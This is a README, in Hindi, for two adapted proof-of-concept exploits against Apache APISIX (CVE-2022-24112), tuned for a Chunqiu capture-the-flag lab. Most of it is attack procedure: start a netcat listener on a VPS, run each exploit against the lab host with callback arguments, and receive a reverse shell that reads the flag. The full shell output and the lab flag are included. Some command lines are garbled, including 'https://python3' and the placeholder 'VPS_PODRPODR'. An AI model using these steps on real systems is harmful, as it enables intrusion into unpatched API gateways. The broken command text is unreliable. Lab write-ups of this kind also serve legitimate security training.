
CVE-2022-24112_POC
एकत्रित POC
春秋云境:CVE-2022-24112 लैब वातावरण के लिए, दो POC को संशोधित किया गया है, M4xSec और twseptian द्वारा लिखित POC को थोड़ा बदलकर 春秋云境 लैब के अनुकूल बनाया गया:
春秋云境:CVE-2022-24112:
Apache Apisix (अपाचे फाउंडेशन, USA) एक क्लाउड-नेटिव माइक्रोसर्विसेज API गेटवे सर्विस है। यह OpenResty और etcd पर आधारित है, जिसमें डायनामिक रूटिंग और प्लगइन हॉट-लोडिंग की सुविधा है, जो माइक्रोसर्विसेज आर्किटेक्चर में API प्रबंधन के लिए उपयुक्त है। Apache APISIX में एक रिमोट कोड एक्सीक्यूशन कमजोरी पाई गई है, जो batch-requests प्लगइन में उपयोगकर्ता के बैच अनुरोधों को प्रभावी ढंग से सीमित न करने के कारण उत्पन्न हुई है। हमलावर इस कमजोरी के माध्यम से Admin API के IP प्रतिबंध को बायपास कर सकता है, जिससे रिमोट कोड एक्सीक्यूशन हो सकता है।
मूल POC:
M4xSec: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py
twseptian: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py
संशोधित POC वे दो हैं जो मैंने ऊपर लिखे हैं, क्रमशः Linux और Windows वातावरण के लिए:
CVE-2022-24112_Linux_by_twseptian.py
VPS पर सुनना शुरू करें: nc -lvvp 18888
POC निर्देशिका में प्रवेश करें और चलाएं:
ध्यान दें: -t डेटा जोड़ते समय http:// या लिखने की आवश्यकता नहीं है, केवल डोमेन + पोर्ट लिखें, जैसा कि नीचे दिया गया है:
https://python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
VPS पर वापस जाकर देखें कि निम्नलिखित स्थिति है:
[root@root ~]# nc -lvvp 18888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::18888
Ncat: Listening on 0.0.0.0:18888
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x:x.
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat /flag
flag{0834f79f-5f40-4389-bce7-c64e969734c4}
CVE-2022-24112_Windows_by_M4xSec.py
VPS पर सुनना शुरू करें: nc -lvvp 18888
POC निर्देशिका में प्रवेश करें और चलाएं:
ध्यान दें: -t डेटा जोड़ते समय http:// या https:// लिखने की आवश्यकता नहीं है, केवल डोमेन + पोर्ट लिखें, जैसा कि नीचे दिया गया है:
python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
VPS पर वापस जाकर देखें कि निम्नलिखित स्थिति है:
[root@root ~]# nc -lvvp 18888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::18888
Ncat: Listening on 0.0.0.0:18888
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x:x.
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat /flag
flag{0834f79f-5f40-4389-bce7-c64e969734c4}